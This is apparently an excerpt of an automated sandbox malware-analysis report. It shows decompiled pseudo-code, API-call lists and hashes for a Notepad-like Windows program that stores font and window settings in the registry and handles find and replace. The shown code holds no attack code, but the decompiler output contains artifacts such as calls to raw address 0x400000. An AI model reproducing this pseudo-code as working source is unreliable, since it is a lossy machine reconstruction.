RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 0040131C
RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 00401335
RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 00401350
RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0040136B
RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 00401386
RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 004013A1
RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 004013BC
RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 004013D5
RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 004013EE
RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00401407
RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00401420
RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 00401439
RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 00401452

Part of subcall function 00401051: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
Part of subcall function 00401051: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
Part of subcall function 00401051: RegCloseKey.ADVAPI32(?), ref: 004010AB

MulDiv.KERNEL32(00000000,000002D0,00000000), ref: 0040146A
RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 00401482
lstrlenW.KERNEL32(00415F9C), ref: 0040148F
RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,00415F9C,00000000), ref: 004014A4
lstrlenW.KERNEL32(00416CE0), ref: 004014AB
RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00416CE0,00000000), ref: 004014C0
lstrlenW.KERNEL32(00416EE8), ref: 004014C7
RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00416EE8,00000000), ref: 004014DC
RegCloseKey.ADVAPI32(?), ref: 004014E1

Strings

bStatusBar, xrefs: 0040144A
lfItalic, xrefs: 00401314
lfPitchAndFamily, xrefs: 00401363
lfOrientation, xrefs: 0040132D
lfCharSet, xrefs: 004012C5
,, xrefs: 00401209
Software\Microsoft\Notepad, xrefs: 004011E5
lfUnderline, xrefs: 004013B4
szTrailer, xrefs: 004014D4
iMarginTop, xrefs: 004013E6
iMarginLeft, xrefs: 00401418
iPointSize, xrefs: 0040147A
lfWeight, xrefs: 004013CD
iMarginBottom, xrefs: 004013FF
fWrap, xrefs: 0040123A
iWindowPosX, xrefs: 00401253
lfEscapement, xrefs: 004012F9
lfQuality, xrefs: 0040137E
lfFaceName, xrefs: 0040149C
lfStrikeOut, xrefs: 00401399
iWindowPosDY, xrefs: 004012AA
iWindowPosY, xrefs: 0040126C
szHeader, xrefs: 004014B8
iWindowPosDX, xrefs: 0040128B
lfOutPrecision, xrefs: 00401348
iMarginRight, xrefs: 00401431
lfClipPrecision, xrefs: 004012E0

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
API String ID: 3965342766-4088090211
Opcode ID: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
Instruction ID: 4b1105d802719206c16219924c3284388b7f1d0651c537867ca8293f0a584477
Opcode Fuzzy Hash: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
Instruction Fuzzy Hash: 33A1E8B294021CFEDB01DB95DD85EEFBFBDEB85B44F2040A7B500E2160D6B55E809B68

Uniqueness

Uniqueness Score: -1.00%

Function 004073F2 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004073F2(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x415a54 = GetProcAddress(_t35, "FlsAlloc");
					 *0x415a58 = GetProcAddress(_t35, "FlsGetValue");
					 *0x415a5c = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x415a54;
					_t39 = TlsSetValue;
					 *0x415a60 = _t7;
					if( *0x415a54 == 0) {
						L6:
						 *0x415a58 = TlsGetValue;
						 *0x415a54 = E00407102;
						 *0x415a5c = _t39;
						 *0x415a60 = TlsFree;
					} else {
						__eflags =  *0x415a58;
						if( *0x415a58 == 0) {
							goto L6;
						} else {
							__eflags =  *0x415a5c;
							if( *0x415a5c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x414584 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x415a58);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00406741();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x415a54);
							 *0x415a54 = _t14;
							_t15 =  *_t41( *0x415a58);
							 *0x415a58 = _t15;
							_t16 =  *_t41( *0x415a5c);
							 *0x415a5c = _t16;
							 *0x415a60 =  *_t41( *0x415a60);
							_t18 = E0040A1DD();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0040713F();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x415a54, E004072C3);
								 *0x414580 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00408C3F(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x415a5c,  *0x414580, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E0040717C(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0040713F();
					return 0;
				}
			}

0x004073f2
0x00407400
0x00407404
0x00407424
0x00407431
0x0040743e
0x00407443
0x00407445
0x0040744c
0x00407452
0x00407457
0x0040746f
0x00407474
0x0040747e
0x00407488
0x0040748e
0x00407459
0x00407459
0x00407460
0x00000000
0x00407462
0x00407462
0x00407469
0x00000000
0x0040746b
0x0040746b
0x0040746d
0x00000000
0x00000000
0x0040746d
0x00407469
0x00407460
0x00407493
0x00407499
0x0040749e
0x004074a1
0x00407568
0x00407568
0x00407568
0x004074a7
0x004074ae
0x004074b0
0x004074b2
0x00000000
0x004074b8
0x004074b8
0x004074c3
0x004074c9
0x004074d1
0x004074d6
0x004074de
0x004074e3
0x004074eb
0x004074f2
0x004074f7
0x004074fc
0x004074fe
0x00407563
0x00407563
0x00000000
0x00407500
0x00407500
0x00407513
0x00407515
0x0040751a
0x0040751d
0x00000000
0x0040751f
0x0040752b
0x0040752f
0x00407531
0x00000000
0x00407533
0x00407544
0x00407546
0x00000000
0x00407548
0x00407548
0x0040754a
0x0040754b
0x00407552
0x00407558
0x0040755c
0x00407560
0x00407560
0x00407546
0x00407531
0x0040751d
0x004074fe
0x004074b2
0x0040756c
0x00407406
0x00407406
0x0040740e
0x0040740e

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004032DD), ref: 004073FA
__mtterm.LIBCMT ref: 00407406

Part of subcall function 0040713F: DecodePointer.KERNEL32(0000000A,00407568,?,004032DD), ref: 00407150
Part of subcall function 0040713F: TlsFree.KERNEL32(00000025,00407568,?,004032DD), ref: 0040716A
Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000000,00000000,77D8F3A0,?,00407568,?,004032DD), ref: 0040A244
Part of subcall function 0040713F: _free.LIBCMT ref: 0040A247
Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000025,77D8F3A0,?,00407568,?,004032DD), ref: 0040A26E

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040741C
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00407429
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00407436
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00407443
TlsAlloc.KERNEL32(?,004032DD), ref: 00407493
TlsSetValue.KERNEL32(00000000,?,004032DD), ref: 004074AE
__init_pointers.LIBCMT ref: 004074B8
EncodePointer.KERNEL32(?,004032DD), ref: 004074C9
EncodePointer.KERNEL32(?,004032DD), ref: 004074D6
EncodePointer.KERNEL32(?,004032DD), ref: 004074E3
EncodePointer.KERNEL32(?,004032DD), ref: 004074F0
DecodePointer.KERNEL32(004072C3,?,004032DD), ref: 00407511
__calloc_crt.LIBCMT ref: 00407526
DecodePointer.KERNEL32(00000000,?,004032DD), ref: 00407540
GetCurrentThreadId.KERNEL32 ref: 00407552

Strings

FlsGetValue, xrefs: 0040741E
FlsAlloc, xrefs: 00407416
FlsSetValue, xrefs: 0040742B
KERNEL32.DLL, xrefs: 004073F5
FlsFree, xrefs: 00407438

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
Instruction ID: abc2b01e53dd726ea6ca3b762da50172eabd6a4d95284a08a9d923f29f314dbe
Opcode Fuzzy Hash: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
Instruction Fuzzy Hash: CA315031D94651EAC711AB75FC88ACA3FA5AF847A0B10863BE500A76F0DB789481CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040232A Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040232A(signed int __edx, struct HWND__* _a4, int _a8, void* _a12, unsigned int _a16) {
				struct tagRECT _v20;
				short _v540;
				void* __ebx;
				void* __edi;
				signed int _t36;
				signed int _t38;
				long _t40;
				signed int _t41;
				signed int _t43;
				signed int _t50;
				int _t54;
				signed int _t60;
				signed int _t62;
				signed int _t68;
				signed int _t70;
				void* _t82;
				int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				long _t94;
				void* _t112;
				void* _t113;

				_t36 =  *0x4151c0 & 0x0000ffff;
				_t83 = _a8;
				_t113 = _t112 - 0x218;
				if(_t83 != _t36) {
					__eflags = _t83 - 0x11;
					if(__eflags > 0) {
						_t38 = _t83 - 0x111;
						__eflags = _t38;
						if(_t38 == 0) {
							E004021A1(_a12 & 0x0000ffff);
							L34:
							_t40 = 0;
							L35:
							return _t40;
						}
						_t41 = _t38 - 6;
						__eflags = _t41;
						if(_t41 == 0) {
							E00401B9F(_a12);
							goto L34;
						}
						_t43 = _t41 - 0x11c;
						__eflags = _t43;
						if(_t43 == 0) {
							DragQueryFileW(_a12, 0,  &_v540, 0x41);
							DragFinish(_a12);
							0x400000( &_v540, 0xffffffff);
							goto L34;
						}
						__eflags = _t43 == 0xd4;
						if(_t43 == 0xd4) {
							goto L34;
						}
						L30:
						_t40 = DefWindowProcW(_a4, _t83, _a12, _a16);
						goto L35;
					}
					if(__eflags == 0) {
						0x400000();
						__eflags = _t36;
						if(_t36 == 0) {
							goto L34;
						}
						_t40 = 1;
						goto L35;
					}
					_t50 = _t83 - 1;
					__eflags = _t50;
					if(_t50 == 0) {
						_t94 = 0x50a00144;
						GetClientRect(_a4,  &_v20);
						__eflags =  *0x415fdc; // 0x0
						if(__eflags == 0) {
							_t94 = 0x50b001c4;
						}
						 *0x415f6c = CreateWindowExW(0x200, L"edit", 0, _t94, 0, 0, _v20.right, _v20.bottom, _a4, 0,  *0x415f60, 0);
						_t54 = CreateFontIndirectW(0x415f80);
						 *0x415f70 = _t54;
						SendMessageW( *0x415f6c, 0x30, _t54, 0);
						SendMessageW( *0x415f6c, 0xc5, 0, 0);
						 *0x415f74 = CreateWindowExW(0, 0x6e, 0, 0x50000000, 0, 0, 0, 0, _a4, 0,  *0x415f60, 0);
						LoadStringW( *0x415f60, 0x206, 0x415f7c, 0);
						 *0x4170f4 =  *0x4170f4 | 0xffffffff;
						 *0x4170f8 =  *0x4170f8 | 0xffffffff;
						E004010B6();
						goto L34;
					}
					_t60 = _t50 - 1;
					__eflags = _t60;
					if(_t60 == 0) {
						E004011CB(__edx);
						PostQuitMessage(0);
						goto L34;
					}
					_t62 = _t60 - 3;
					__eflags = _t62;
					if(_t62 == 0) {
						E00401170(_a16 & 0x0000ffff, _a16 >> 0x10);
						goto L34;
					}
					_t68 = _t62;
					__eflags = _t68;
					if(_t68 == 0) {
						SetFocus( *0x415f6c);
						goto L34;
					}
					_t70 = _t68 - 9;
					__eflags = _t70;
					if(_t70 != 0) {
						goto L30;
					}
					0x400000();
					__eflags = _t70;
					if(_t70 != 0) {
						DestroyWindow(_a4);
					}
					goto L34;
				}
				_t82 = _a16;
				if(( *(_t82 + 0xc) & 0x00000040) != 0) {
					 *0x415f68 =  *0x415f68 & 0x00000000;
				}
				if(( *(_t82 + 0xc) & 0x00000008) != 0) {
					_t89 = 0xa;
					memcpy(0x417124, _t82, _t89 << 2);
					_t113 = _t113 + 0xc;
					E00401C3A(_t82);
				}
				if(( *(_t82 + 0xc) & 0x00000010) != 0) {
					_t87 = 0xa;
					memcpy(0x417124, _t82, _t87 << 2);
					_t113 = _t113 + 0xc;
					E00401D4C(_t82);
				}
				if(( *(_t82 + 0xc) & 0x00000020) != 0) {
					_t85 = 0xa;
					memcpy(0x417124, _t82, _t85 << 2);
					E00401E09(_t82);
				}
				goto L34;
			}

0x0040232d
0x00402334
0x00402337
0x00402342
0x004023a6
0x004023a9
0x004024fc
0x004024fc
0x00402501
0x00402563
0x00402568
0x00402568
0x0040256a
0x0040256e
0x0040256e
0x00402503
0x00402503
0x00402506
0x00402558
0x00000000
0x00402558
0x00402508
0x00402508
0x0040250d
0x00402536
0x0040253f
0x0040254e
0x00000000
0x0040254e
0x0040250f
0x00402514
0x00000000
0x00000000
0x00402516
0x00402520
0x00000000
0x00402520
0x004023af
0x004024ec
0x004024f1
0x004024f3
0x00000000
0x00000000
0x004024f7
0x00000000
0x004024f7
0x004023b7
0x004023b7
0x004023b8
0x0040242a
0x0040242f
0x00402437
0x0040243d
0x0040243f
0x0040243f
0x00402470
0x00402475
0x0040248b
0x00402490
0x0040249f
0x004024cc
0x004024d1
0x004024d7
0x004024de
0x004024e5
0x00000000
0x004024e5
0x004023ba
0x004023ba
0x004023bb
0x00402411
0x00402418
0x00000000
0x00402418
0x004023bd
0x004023bd
0x004023c0
0x00402407
0x00000000
0x00402407
0x004023c3
0x004023c3
0x004023c4
0x004023f0
0x00000000
0x004023f0
0x004023c6
0x004023c6
0x004023c9
0x00000000
0x00000000
0x004023cf
0x004023d4
0x004023d6
0x004023df
0x004023df
0x00000000
0x004023d6
0x00402344
0x0040234b
0x0040234d
0x0040234d
0x00402358
0x0040235c
0x00402365
0x00402365
0x00402367
0x00402367
0x00402370
0x00402374
0x0040237c
0x0040237c
0x00402380
0x00402380
0x00402389
0x00402391
0x0040239a
0x0040239c
0x0040239c
0x00000000

APIs

DestroyWindow.USER32(?), ref: 004023DF
SetFocus.USER32 ref: 004023F0

Strings

edit, xrefs: 0040245F
$qA, xrefs: 00402394
$qA, xrefs: 0040235F
$qA, xrefs: 00402377

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: DestroyFocusWindow
String ID: $qA$$qA$$qA$edit
API String ID: 3487535441-3532291762
Opcode ID: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
Instruction ID: 16f5dcc297cbe28d248b0e56e8d7a63b236712e1f54e60767082c5174542b945
Opcode Fuzzy Hash: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
Instruction Fuzzy Hash: 0B51C131140218BBDB219F75DE4CBEB3E68EB45394F148136FA04A61E1C7BD8941DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401ABC Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 70
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401ABC() {
				signed int _t20;
				signed int _t25;
				signed int _t30;
				WCHAR* _t34;
				WCHAR* _t35;
				WCHAR* _t38;

				LoadStringW( *0x415f60, 0x176, 0x416804, 0xff);
				_t34 = 0x416806 + lstrlenW(0x416804) * 2;
				lstrcpyW(_t34, L"*.txt");
				_t35 = _t34 + 2 + lstrlenW(_t34) * 2;
				LoadStringW( *0x415f60, 0x175, _t35, 0xff);
				_t38 = _t35 + 2 + lstrlenW(_t35) * 2;
				lstrcpyW(_t38, L"*.*");
				 *((short*)(_t38 + 2 + lstrlenW(_t38) * 2)) = 0;
				_t20 =  *0x415fdc; // 0x0
				 *0x41714c =  *0x41714c & 0;
				 *0x417150 =  *0x417150 & 0;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x415f64), 0x119,  ~_t20 & 0x00000008);
				_t25 =  *0x415f78; // 0x0
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t25 & 0x00000008);
				_t30 =  *0x415f78; // 0x0
				asm("sbb eax, eax");
				return ShowWindow( *0x415f74,  ~_t30 & 0x00000005);
			}

0x00401adb
0x00401ae6
0x00401af3
0x00401b01
0x00401b11
0x00401b16
0x00401b20
0x00401b31
0x00401b36
0x00401b3b
0x00401b41
0x00401b49
0x00401b63
0x00401b65
0x00401b6c
0x00401b80
0x00401b82
0x00401b89
0x00401b9e

APIs

LoadStringW.USER32(00000176,00416804,000000FF,00000000), ref: 00401ADB
lstrlenW.KERNEL32(00416804), ref: 00401AE4
lstrcpyW.KERNEL32 ref: 00401AF3
lstrlenW.KERNEL32(80000000), ref: 00401AFA
LoadStringW.USER32(00000175,?,000000FF), ref: 00401B11
lstrlenW.KERNEL32(?), ref: 00401B14
lstrcpyW.KERNEL32 ref: 00401B20
lstrlenW.KERNEL32(?), ref: 00401B27
GetMenu.USER32(00000119), ref: 00401B5A
CheckMenuItem.USER32(00000000), ref: 00401B63
GetMenu.USER32(00000205), ref: 00401B7D
CheckMenuItem.USER32(00000000), ref: 00401B80
ShowWindow.USER32(00000000), ref: 00401B95

Strings

*.*, xrefs: 00401B1A
*.txt, xrefs: 00401AED

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
String ID: *.*$*.txt
API String ID: 3918228958-3257935098
Opcode ID: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
Instruction ID: 572a540fb6504921a5b5a71d4603651758fe767a8bf175bd1912394847e7168a
Opcode Fuzzy Hash: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
Instruction Fuzzy Hash: 56118132590629BBD7016B78EC4ADEA3B7DEB88711B05C432F101E71B0D7B95881CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401E09 Relevance: 19.6, APIs: 13, Instructions: 90
memorywindowstringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401E09(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				int _v16;
				void* _t27;
				void* _t33;
				int _t38;
				void* _t44;
				int _t50;
				intOrPtr _t51;

				_v16 = lstrlenW( *(_a4 + 0x10));
				SendMessageW( *0x415f6c, 0xb1, 0, 0);
				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
				_t50 = _t4;
				_push(_t50 + _t50);
				_push(0);
				while(1) {
					_t27 = HeapAlloc(GetProcessHeap(), ??, ??);
					_v12 = _t27;
					if(_t27 == 0) {
						break;
					}
					GetWindowTextW( *0x415f6c, _v12, _t50);
					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
					_t51 = _a4;
					_t33 = ( *(_t51 + 0xc) & 0x00000005) - 1;
					if(_t33 == 0) {
						L3:
						if(_v8 ==  ~_v12) {
							_v8 = _v8 | 0xffffffff;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_t38 = _v8;
						if(_t38 == 0xffffffff) {
							return SendMessageW( *0x415f6c, 0xb1, 0, 0);
						}
						SendMessageW( *0x415f6c, 0xb1, _t38, _v16 + _t38);
						SendMessageW( *0x415f6c, 0xc2, 1,  *(_t51 + 0x14));
						_t18 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
						_t50 = _t18;
						_push(_t50 + _t50);
						_push(0);
						continue;
					}
					_t44 = _t33 - 4;
					if(_t44 == 0) {
						goto L3;
					}
					return _t44;
				}
				return _t27;
			}

0x00401e33
0x00401e36
0x00401e44
0x00401e44
0x00401e4a
0x00401e4b
0x00401eee
0x00401ef1
0x00401ef7
0x00401efc
0x00000000
0x00000000
0x00401e61
0x00401e78
0x00401e7a
0x00401e83
0x00401e84
0x00401e8f
0x00401e97
0x00401e99
0x00401e99
0x00401ea5
0x00401eab
0x00401eb1
0x00000000
0x00401f13
0x00401ec5
0x00401ed7
0x00401ee5
0x00401ee5
0x00401eeb
0x00401eec
0x00000000
0x00401eec
0x00401e86
0x00401e89
0x00000000
0x00000000
0x00401f19
0x00401f19
0x00000000

APIs

lstrlenW.KERNEL32(?), ref: 00401E18
SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401E36
GetWindowTextLengthW.USER32 ref: 00401E3E
GetWindowTextW.USER32 ref: 00401E61
SendMessageW.USER32(000000B0,00000000,?), ref: 00401E78
GetProcessHeap.KERNEL32(00000000,?), ref: 00401EA2
HeapFree.KERNEL32(00000000), ref: 00401EA5
SendMessageW.USER32(000000B1,?,?), ref: 00401EC5
SendMessageW.USER32(000000C2,00000001,?), ref: 00401ED7
GetWindowTextLengthW.USER32 ref: 00401EDF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401EEE
HeapAlloc.KERNEL32(00000000), ref: 00401EF1
SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401F13

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: MessageSend$Heap$TextWindow$LengthProcess$AllocFreelstrlen
String ID:
API String ID: 1498816615-0
Opcode ID: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
Instruction ID: ce49090e5d19a19af0320e951ed4d397d30ac25977f929a6b7e329fcc34971d6
Opcode Fuzzy Hash: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
Instruction Fuzzy Hash: 57313A31A00609FFDB119BA0EC89FEE7B79EB88314F108031F941A61B0C7B5AD559B28

Uniqueness

Uniqueness Score: -1.00%

Function 00401C3A Relevance: 16.6, APIs: 11, Instructions: 94
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401C3A(WCHAR* _a4) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* _t28;
				signed int _t34;
				WCHAR* _t42;
				void* _t43;
				void* _t44;
				WCHAR* _t45;
				void* _t48;
				WCHAR* _t49;
				signed int _t53;
				int _t55;
				WCHAR* _t56;

				_v12 = lstrlenW(_a4[8]);
				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
				_t55 = _t4;
				_t28 = HeapAlloc(GetProcessHeap(), 0, _t55 + _t55);
				_t48 = _t28;
				if(_t48 != 0) {
					GetWindowTextW( *0x415f6c, _t48, _t55);
					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
					_t49 = _a4;
					_t34 =  *(_t49 + 0xc) & 0x00000005;
					if(_t34 == 0) {
						L5:
						_t56 = _a4;
						L6:
						_v8 = _t56 - _t48 >> 1;
						HeapFree(GetProcessHeap(), 0, _t48);
						if(_t56 != 0) {
							return SendMessageW( *0x415f6c, 0xb1, _v8, _v12 + _v8);
						}
						_t42 = _a4;
						0x400000( *0x415f68, 0x17b, _t42[8], 0x40);
						return _t42;
					}
					_t43 = _t34 - 1;
					if(_t43 == 0) {
						goto L5;
					}
					_t44 = _t43 - 3;
					if(_t44 == 0) {
						_t45 =  *(_t49 + 0x10);
						_t53 = _v8 - _v12;
						_v16 = _t45;
						_t18 = _t53 * 2; // -2
						_t56 = _t48 + _t18 - 2;
						lstrlenW(_t45);
						while(_t56 >= _t48) {
							if(lstrcmpW(_t56, _v16) == 0) {
								goto L6;
							}
							_t56 = _t56 - 2;
						}
						_t56 = 0;
						goto L6;
					}
					_t28 = _t44 - 1;
					if(_t28 == 0) {
						goto L5;
					}
				}
				return _t28;
			}

0x00401c57
0x00401c60
0x00401c60
0x00401c70
0x00401c76
0x00401c7a
0x00401c88
0x00401c9f
0x00401ca5
0x00401cae
0x00401cb1
0x00401cc2
0x00401cc2
0x00401cc5
0x00401cce
0x00401cd8
0x00401ce0
0x00000000
0x00401d3f
0x00401ce2
0x00401cf5
0x00000000
0x00401cf5
0x00401cb3
0x00401cb4
0x00000000
0x00000000
0x00401cb6
0x00401cb9
0x00401cfc
0x00401d02
0x00401d06
0x00401d09
0x00401d09
0x00401d0d
0x00401d22
0x00401d1d
0x00000000
0x00000000
0x00401d1f
0x00401d1f
0x00401d26
0x00000000
0x00401d26
0x00401cbb
0x00401cbc
0x00000000
0x00000000
0x00401cbc
0x00401d49

APIs

lstrlenW.KERNEL32(?), ref: 00401C4F
GetWindowTextLengthW.USER32 ref: 00401C5A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401C69
HeapAlloc.KERNEL32(00000000), ref: 00401C70
GetWindowTextW.USER32 ref: 00401C88
SendMessageW.USER32(000000B0,00000000,?), ref: 00401C9F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401CD1
HeapFree.KERNEL32(00000000), ref: 00401CD8
lstrlenW.KERNEL32(?), ref: 00401D0D
lstrcmpW.KERNEL32(-00000002,?), ref: 00401D15
SendMessageW.USER32(000000B1,?,?), ref: 00401D3F

Memory Dump Source

